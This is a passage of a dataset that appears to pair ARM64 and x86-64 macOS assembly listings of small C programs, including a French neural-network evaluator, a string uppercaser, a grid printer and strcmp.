movl %eax, -12(%rbp)
jmp LBB38_9
LBB38_12:
leaq L_.str.45(%rip), %rdi
movb $0, %al
callq _printf
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _printNeurone ## -- Begin function printNeurone
.p2align 4, 0x90
_printNeurone: ## @printNeurone
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movl $0, -12(%rbp)
movq -8(%rbp), %rax
movsd 8(%rax), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.85(%rip), %rdi
movb $1, %al
callq _printf
movl $0, -12(%rbp)
LBB39_1: ## =>This Inner Loop Header: Depth=1
movl -12(%rbp), %eax
movq -8(%rbp), %rcx
movl (%rcx), %ecx
subl $1, %ecx
cmpl %ecx, %eax
jge LBB39_4
## %bb.2: ## in Loop: Header=BB39_1 Depth=1
movq -8(%rbp), %rax
movq 16(%rax), %rax
movslq -12(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.85(%rip), %rdi
movb $1, %al
callq _printf
## %bb.3: ## in Loop: Header=BB39_1 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB39_1
LBB39_4:
movq -8(%rbp), %rax
cmpl $1, (%rax)
jl LBB39_6
## %bb.5:
movq -8(%rbp), %rax
movq 16(%rax), %rax
movq -8(%rbp), %rcx
movl (%rcx), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.86(%rip), %rdi
movb $1, %al
callq _printf
LBB39_6:
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "File error "
L_.str.1: ## @.str.1
.asciz "Reading error "
L_.str.2: ## @.str.2
.asciz "'\n';"
L_.str.3: ## @.str.3
.asciz "w"
L_.str.4: ## @.str.4
.asciz "Erreur d'ouverture de votre fichier du fichier \n"
L_.str.5: ## @.str.5
.asciz "%d;%d\n"
L_.str.6: ## @.str.6
.asciz "%lf;"
L_.str.7: ## @.str.7
.asciz "%lf\n"
L_.str.8: ## @.str.8
.asciz "le nombre de argc : %d"
L_.str.9: ## @.str.9
.asciz "load"
L_.str.10: ## @.str.10
.asciz "network"
L_.str.11: ## @.str.11
.asciz "r"
L_.str.12: ## @.str.12
.asciz "Erreur d'ouveture du fichier : %s\n"
L_.str.13: ## @.str.13
.asciz "img"
L_.str.14: ## @.str.14
.asciz "Erreur-->argv[2] : n'est pas conforme.\nargv[2] = network, pour charger reseau\nargv[2] = img ,pour charger une image de test\n"
L_.str.15: ## @.str.15
.asciz "Merci de verifier les arguments de ia.exe \n"
L_.str.16: ## @.str.16
.asciz "Erreur : initNode "
L_.str.17: ## @.str.17
.asciz "Erreur : initListe() \n"
L_.str.18: ## @.str.18
.asciz "%d "
L_.str.19: ## @.str.19
.asciz "\n\n\n"
L_.str.20: ## @.str.20
.asciz "Error could not allocate memory !\n"
L_.str.21: ## @.str.21
.asciz "wb"
L_.str.22: ## @.str.22
.asciz "Error: could not open file '%s' !\n"
L_.str.23: ## @.str.23
.asciz ";"
L_.str.24: ## @.str.24
.asciz "Erreur-->argv[2] : %s n'est pas conforme.\nargv[2] = network, pour charger reseau\nargv[2] = img ,pour charger une image de test\n"
L_.str.25: ## @.str.25
.asciz "Fichier %s Ouvert , en cours de chargement...\n"
L_.str.26: ## @.str.26
.asciz "verifie.csv"
L_.str.27: ## @.str.27
.asciz "fin de chargement\n"
L_.str.28: ## @.str.28
.asciz "Fichier d'image Ouvert, en cours de chargement...\n"
L_.str.29: ## @.str.29
.asciz "fin de chargement de %s \n"
L_.str.30: ## @.str.30
.asciz "Fichier de network Ouvert, en cours de chargement...\n"
L_.str.31: ## @.str.31
.asciz "vous avez charger le reseau et une base d'images pour le avaluer le reseau\n"
L_.str.32: ## @.str.32
.asciz "format d'affichage pendant l'evaluation \n"
L_.str.33: ## @.str.33
.asciz "Numero image ==> prediction: classimg : statut : taux de reussite : taux erreur : nbre ok : nbre mauvaise prediction"
L_.str.34: ## @.str.34
.asciz "non"
L_.str.35: ## @.str.35
.asciz "\nImage %-6d: "
L_.str.36: ## @.str.36
.asciz "==> %d\t"
L_.str.37: ## @.str.37
.asciz "%d\t"
L_.str.38: ## @.str.38
.asciz "ok"
L_.str.39: ## @.str.39
.asciz "%s\t"
L_.str.40: ## @.str.40
.asciz "\t%-7g%%"
L_.str.41: ## @.str.41
.asciz "\t%-7g%% "
L_.str.42: ## @.str.42
.asciz "\t %d"
L_.str.43: ## @.str.43
.asciz "\n\nVoulez vous continuer le pas a pas (OUI/NON)? : NON = different de OUI \n"
L_.str.44: ## @.str.44
.asciz "OUI"
L_.str.45: ## @.str.45
.asciz "\n"
L_.str.46: ## @.str.46
.asciz "=========Apres Evaluation de %d images Nous avons ===========\n"
L_.str.47: ## @.str.47
.asciz "Taux d'erreur : %g%%\n"
L_.str.48: ## @.str.48
.asciz "Taux de reussite : %g%%\n"
L_.str.49: ## @.str.49
.asciz "Nombre d'image avec une bonne prediction : %d\n"
L_.str.50: ## @.str.50
.asciz "Nombre d'image avec une mauvaise prediction : %d\n"
L_.str.51: ## @.str.51
.asciz "************Fin Pour le Reseau ==> Statistique !*****************"
L_.str.52: ## @.str.52
.asciz "\nVoulez vous continuer sur la statistique des couches du reseau (OUI/NON)? : NON = different de OUI \n"
L_.str.53: ## @.str.53
.asciz "\nVoulez vous charger une image (OUI/NON)? : NON = different de OUI \n"
L_.str.54: ## @.str.54
.asciz "Entrer le nom du fichier a charger \n"
L_.str.55: ## @.str.55
.asciz "Erreur : erreur d'ouverture du fichier "
L_.str.56: ## @.str.56
.asciz "Vous avez choisie de ne pas charger une image donc nous allons utiliser notre image\n"
L_.str.57: ## @.str.57
.asciz "images_data.csv"
L_.str.58: ## @.str.58
.asciz "Erreur : erreur d'ouverture du fichier image dans InterloadImage"
L_.str.59: ## @.str.59
.asciz "continuer ?\n Oui = La touche entree\t Non = Crtl+c\n"
L_.str.60: ## @.str.60
.asciz "\nVoulez vous charger le Network (OUI/NON)? \n"
L_.str.61: ## @.str.61
.asciz "1 = OUI et 0 = NON\n"
L_.str.62: ## @.str.62
.asciz "Entrer le nom du fichier network \n"
L_.str.63: ## @.str.63
.asciz "Erreur : erreur d'ouverture du fichier network,merci de verifier l'emplacement du fichier "
L_.str.64: ## @.str.64
.asciz "Chargement de %s en cours \n"
L_.str.65: ## @.str.65
.asciz "Vous avez choisie de ne pas charger le network donc nous allons utiliser notre network"
L_.str.66: ## @.str.66
.asciz "network_100_30_10.csv"
L_.str.67: ## @.str.67
.asciz "\t--- Donnees pour les biais ---\n"
L_.str.68: ## @.str.68
.asciz "-Couche [%d] \n"
L_.str.69: ## @.str.69
.asciz " Nombre de Neurones : %d \n"
L_.str.70: ## @.str.70
.asciz " Valeur moyenne : %g\n"
L_.str.71: ## @.str.71
.asciz " Valeur de la deviation standard : %g\n"
L_.str.72: ## @.str.72
.asciz " Valeur max : %g\n"
L_.str.73: ## @.str.73
.asciz " Valeur min : %g\n"
L_.str.74: ## @.str.74
.asciz "\t--- Donnees pour les poids ---\n"
L_.str.75: ## @.str.75
.asciz " Nombre de Neurones : %5d \n"
L_.str.76: ## @.str.76
.asciz " Valeur min : %g\n"
L_.str.77: ## @.str.77
.asciz "Voudriez-vous charger un autre fichier Reseaux ou utiliser notre fichier csv.\nTaper sur [O/o] pour oui ou autre pour non ? "
L_.str.78: ## @.str.78
.asciz "Veuiller saisir le nom du fichier : "
L_.str.79: ## @.str.79
.asciz "[-] Erreur pendant l'ouverture du fichier.\n"
L_.str.80: ## @.str.80
.asciz "**********************************************************\n"
L_.str.81: ## @.str.81
.asciz "\tRESEAU AVEC %d COUCHES\n"
L_.str.82: ## @.str.82
.asciz "network_30_10.csv"
L_.str.83: ## @.str.83
.asciz "Appuyez sur entrer pour voir la suite \n"
L_.str.84: ## @.str.84
.asciz "le reseau est vide !!\n"
L_.str.85: ## @.str.85
.asciz "%g ;"
L_.str.86: ## @.str.86
.asciz "%g \n"
L_.str.87: ## @.str.87
.asciz "Layers : Inputs \n"
L_.str.88: ## @.str.88
.asciz "%g "
L_.str.89: ## @.str.89
.asciz "neurone %d \n"
L_.str.90: ## @.str.90
.asciz "Layers : Outputs \n"
.subsections_via_symbols
| the_stack_data/87636479.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _exupcs ; -- Begin function exupcs
.p2align 2
_exupcs: ; @exupcs
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str x1, [sp, #16]
str wzr, [sp, #12]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldrsw x8, [sp, #12]
ldr x9, [sp, #16]
subs x8, x8, x9
cset w8, ge
tbnz w8, #0, LBB0_10
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur x8, [x29, #-8]
ldrsb w0, [x8]
bl _isprint
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldur x9, [x29, #-8]
mov w8, #32
strb w8, [x9]
b LBB0_8
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldur x8, [x29, #-8]
ldrsb w0, [x8]
bl _isalpha
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB0_7
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
ldur x8, [x29, #-8]
ldrsb w0, [x8]
bl _islower
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
ldur x8, [x29, #-8]
ldrsb w0, [x8]
bl _toupper
ldur x8, [x29, #-8]
strb w0, [x8]
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_1 Depth=1
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
ldur x8, [x29, #-8]
add x8, x8, #1
stur x8, [x29, #-8]
b LBB0_1
LBB0_10:
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _exupcs ## -- Begin function exupcs
.p2align 4, 0x90
_exupcs: ## @exupcs
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movl $0, -20(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movslq -20(%rbp), %rax
cmpq -16(%rbp), %rax
jge LBB0_10
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movsbl (%rax), %edi
callq _isprint
cmpl $0, %eax
jne LBB0_4
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movb $32, (%rax)
jmp LBB0_8
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movsbl (%rax), %edi
callq _isalpha
cmpl $0, %eax
je LBB0_7
## %bb.5: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movsbl (%rax), %edi
callq _islower
cmpl $0, %eax
je LBB0_7
## %bb.6: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movsbl (%rax), %edi
callq _toupper
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
LBB0_7: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_8
LBB0_8: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_9
LBB0_9: ## in Loop: Header=BB0_1 Depth=1
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
movq -8(%rbp), %rax
addq $1, %rax
movq %rax, -8(%rbp)
jmp LBB0_1
LBB0_10:
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/43887970.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
ldr w8, [sp, #8]
mov w10, #2
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
b LBB0_2
LBB0_2:
mov w0, #0
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "n is even\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movl -8(%rbp), %eax
movl $2, %ecx
cltd
idivl %ecx
cmpl $0, %edx
jne LBB0_2
## %bb.1:
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
LBB0_2:
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "n is even\n"
.subsections_via_symbols
| the_stack_data/215766919.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _rush ; -- Begin function rush
.p2align 2
_rush: ; @rush
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
str w1, [sp, #8]
ldur w8, [x29, #-4]
subs w8, w8, #0
cset w8, ge
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
b LBB0_28
LBB0_2:
mov w8, #1
str w8, [sp, #4]
b LBB0_3
LBB0_3: ; =>This Loop Header: Depth=1
; Child Loop BB0_5 Depth 2
ldr w8, [sp, #4]
ldr w9, [sp, #8]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_28
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=1
mov w8, #1
str w8, [sp]
b LBB0_5
LBB0_5: ; Parent Loop BB0_3 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp]
ldur w9, [x29, #-4]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_27
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp, #4]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp]
subs w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB0_12
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp, #4]
subs w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB0_13
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp]
subs w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB0_13
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp, #4]
ldr w9, [sp, #8]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB0_13
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp]
ldur w9, [x29, #-4]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB0_13
b LBB0_12
LBB0_12: ; in Loop: Header=BB0_5 Depth=2
mov w0, #47
bl _ft_putchar
b LBB0_26
LBB0_13: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp, #4]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_15
b LBB0_14
LBB0_14: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp]
ldur w9, [x29, #-4]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB0_17
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp, #4]
ldr w9, [sp, #8]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB0_18
b LBB0_16
LBB0_16: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_18
b LBB0_17
LBB0_17: ; in Loop: Header=BB0_5 Depth=2
mov w0, #92
bl _ft_putchar
b LBB0_25
LBB0_18: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp, #4]
subs w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB0_23
b LBB0_19
LBB0_19: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp]
subs w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB0_23
b LBB0_20
LBB0_20: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp, #4]
ldr w9, [sp, #8]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB0_23
b LBB0_21
LBB0_21: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp]
ldur w9, [x29, #-4]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB0_23
b LBB0_22
LBB0_22: ; in Loop: Header=BB0_5 Depth=2
mov w0, #32
bl _ft_putchar
b LBB0_24
LBB0_23: ; in Loop: Header=BB0_5 Depth=2
mov w0, #42
bl _ft_putchar
b LBB0_24
LBB0_24: ; in Loop: Header=BB0_5 Depth=2
b LBB0_25
LBB0_25: ; in Loop: Header=BB0_5 Depth=2
b LBB0_26
LBB0_26: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp]
add w8, w8, #1
str w8, [sp]
b LBB0_5
LBB0_27: ; in Loop: Header=BB0_3 Depth=1
mov w0, #10
bl _ft_putchar
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB0_3
LBB0_28:
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _rush ## -- Begin function rush
.p2align 4, 0x90
_rush: ## @rush
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
cmpl $0, -4(%rbp)
jge LBB0_2
## %bb.1:
jmp LBB0_28
LBB0_2:
movl $1, -12(%rbp)
LBB0_3: ## =>This Loop Header: Depth=1
## Child Loop BB0_5 Depth 2
movl -12(%rbp), %eax
cmpl -8(%rbp), %eax
jg LBB0_28
## %bb.4: ## in Loop: Header=BB0_3 Depth=1
movl $1, -16(%rbp)
LBB0_5: ## Parent Loop BB0_3 Depth=1
## => This Inner Loop Header: Depth=2
movl -16(%rbp), %eax
cmpl -4(%rbp), %eax
jg LBB0_27
## %bb.6: ## in Loop: Header=BB0_5 Depth=2
cmpl $1, -12(%rbp)
jne LBB0_8
## %bb.7: ## in Loop: Header=BB0_5 Depth=2
cmpl $1, -16(%rbp)
je LBB0_12
LBB0_8: ## in Loop: Header=BB0_5 Depth=2
cmpl $1, -12(%rbp)
je LBB0_13
## %bb.9: ## in Loop: Header=BB0_5 Depth=2
cmpl $1, -16(%rbp)
je LBB0_13
## %bb.10: ## in Loop: Header=BB0_5 Depth=2
movl -12(%rbp), %eax
cmpl -8(%rbp), %eax
jne LBB0_13
## %bb.11: ## in Loop: Header=BB0_5 Depth=2
movl -16(%rbp), %eax
cmpl -4(%rbp), %eax
jne LBB0_13
LBB0_12: ## in Loop: Header=BB0_5 Depth=2
movl $47, %edi
callq _ft_putchar
jmp LBB0_26
LBB0_13: ## in Loop: Header=BB0_5 Depth=2
cmpl $1, -12(%rbp)
jne LBB0_15
## %bb.14: ## in Loop: Header=BB0_5 Depth=2
movl -16(%rbp), %eax
cmpl -4(%rbp), %eax
je LBB0_17
LBB0_15: ## in Loop: Header=BB0_5 Depth=2
movl -12(%rbp), %eax
cmpl -8(%rbp), %eax
jne LBB0_18
## %bb.16: ## in Loop: Header=BB0_5 Depth=2
cmpl $1, -16(%rbp)
jne LBB0_18
LBB0_17: ## in Loop: Header=BB0_5 Depth=2
movl $92, %edi
callq _ft_putchar
jmp LBB0_25
LBB0_18: ## in Loop: Header=BB0_5 Depth=2
cmpl $1, -12(%rbp)
je LBB0_23
## %bb.19: ## in Loop: Header=BB0_5 Depth=2
cmpl $1, -16(%rbp)
je LBB0_23
## %bb.20: ## in Loop: Header=BB0_5 Depth=2
movl -12(%rbp), %eax
cmpl -8(%rbp), %eax
je LBB0_23
## %bb.21: ## in Loop: Header=BB0_5 Depth=2
movl -16(%rbp), %eax
cmpl -4(%rbp), %eax
je LBB0_23
## %bb.22: ## in Loop: Header=BB0_5 Depth=2
movl $32, %edi
callq _ft_putchar
jmp LBB0_24
LBB0_23: ## in Loop: Header=BB0_5 Depth=2
movl $42, %edi
callq _ft_putchar
LBB0_24: ## in Loop: Header=BB0_5 Depth=2
jmp LBB0_25
LBB0_25: ## in Loop: Header=BB0_5 Depth=2
jmp LBB0_26
LBB0_26: ## in Loop: Header=BB0_5 Depth=2
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB0_5
LBB0_27: ## in Loop: Header=BB0_3 Depth=1
movl $10, %edi
callq _ft_putchar
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB0_3
LBB0_28:
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/22012968.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _v ; -- Begin function v
.p2align 2
_v: ; @v
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #16]
str wzr, [sp, #12]
str wzr, [sp, #8]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #8]
adrp x9, _N@PAGE
ldr w9, [x9, _N@PAGEOFF]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldrsw x9, [sp, #8]
adrp x8, _weights@PAGE
add x8, x8, _weights@PAGEOFF
ldrsw x8, [x8, x9, lsl #2]
ldr x9, [sp, #16]
and x9, x9, #0x1
mul x9, x8, x9
ldrsw x8, [sp, #12]
add x8, x8, x9
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #12]
ldr x8, [sp, #16]
lsr x8, x8, #1
str x8, [sp, #16]
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB0_1
LBB0_4:
ldr w8, [sp, #12]
adrp x9, _sum_weights@PAGE
ldr w9, [x9, _sum_weights@PAGEOFF]
mov w10, #2
sdiv w9, w9, w10
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5:
fmov d0, #1.00000000
str d0, [sp, #24]
b LBB0_7
LBB0_6:
movi d0, #0000000000000000
str d0, [sp, #24]
b LBB0_7
LBB0_7:
ldr d0, [sp, #24]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.section __DATA,__data
.globl _N ; @N
.p2align 2
_N:
.long 15 ; 0xf
.globl _weights ; @weights
.p2align 2
_weights:
.long 1 ; 0x1
.long 3 ; 0x3
.long 3 ; 0x3
.long 6 ; 0x6
.long 12 ; 0xc
.long 16 ; 0x10
.long 17 ; 0x11
.long 19 ; 0x13
.long 19 ; 0x13
.long 19 ; 0x13
.long 21 ; 0x15
.long 22 ; 0x16
.long 23 ; 0x17
.long 24 ; 0x18
.long 29 ; 0x1d
.globl _sum_weights ; @sum_weights
.p2align 2
_sum_weights:
.long 234 ; 0xea
.globl _d ; @d
.p2align 3
_d:
.quad 0x3ff0000000000000 ; double 1
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function v
LCPI0_0:
.quad 0x3ff0000000000000 ## double 1
.section __TEXT,__text,regular,pure_instructions
.globl _v
.p2align 4, 0x90
_v: ## @v
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -16(%rbp)
movl $0, -20(%rbp)
movl $0, -24(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movl -24(%rbp), %eax
cmpl _N(%rip), %eax
jge LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movslq -24(%rbp), %rcx
leaq _weights(%rip), %rax
movslq (%rax,%rcx,4), %rcx
movq -16(%rbp), %rax
andq $1, %rax
imulq %rax, %rcx
movslq -20(%rbp), %rax
addq %rcx, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -20(%rbp)
movq -16(%rbp), %rax
shrq $1, %rax
movq %rax, -16(%rbp)
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB0_1
LBB0_4:
movl -20(%rbp), %eax
movl %eax, -28(%rbp) ## 4-byte Spill
movl _sum_weights(%rip), %eax
movl $2, %ecx
cltd
idivl %ecx
movl %eax, %ecx
movl -28(%rbp), %eax ## 4-byte Reload
cmpl %ecx, %eax
jle LBB0_6
## %bb.5:
movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -8(%rbp)
jmp LBB0_7
LBB0_6:
xorps %xmm0, %xmm0
movsd %xmm0, -8(%rbp)
LBB0_7:
movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero
popq %rbp
retq
.cfi_endproc
## -- End function
.section __DATA,__data
.globl _N ## @N
.p2align 2
_N:
.long 15 ## 0xf
.globl _weights ## @weights
.p2align 4
_weights:
.long 1 ## 0x1
.long 3 ## 0x3
.long 3 ## 0x3
.long 6 ## 0x6
.long 12 ## 0xc
.long 16 ## 0x10
.long 17 ## 0x11
.long 19 ## 0x13
.long 19 ## 0x13
.long 19 ## 0x13
.long 21 ## 0x15
.long 22 ## 0x16
.long 23 ## 0x17
.long 24 ## 0x18
.long 29 ## 0x1d
.globl _sum_weights ## @sum_weights
.p2align 2
_sum_weights:
.long 234 ## 0xea
.globl _d ## @d
.p2align 3
_d:
.quad 0x3ff0000000000000 ## double 1
.subsections_via_symbols
| the_stack_data/38192.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/1012761.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _strcmp ; -- Begin function strcmp
.p2align 2
_strcmp: ; @strcmp
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str x1, [sp, #16]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #24]
ldrsb w8, [x8]
ldr x9, [sp, #16]
add x10, x9, #1
str x10, [sp, #16]
ldrsb w9, [x9]
subs w8, w8, w9
str w8, [sp, #12]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #24]
add x9, x8, #1
str x9, [sp, #24]
ldrb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
b LBB0_5
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
b LBB0_1
LBB0_5:
ldr w0, [sp, #12]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _strcmp ## -- Begin function strcmp
.p2align 4, 0x90
_strcmp: ## @strcmp
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
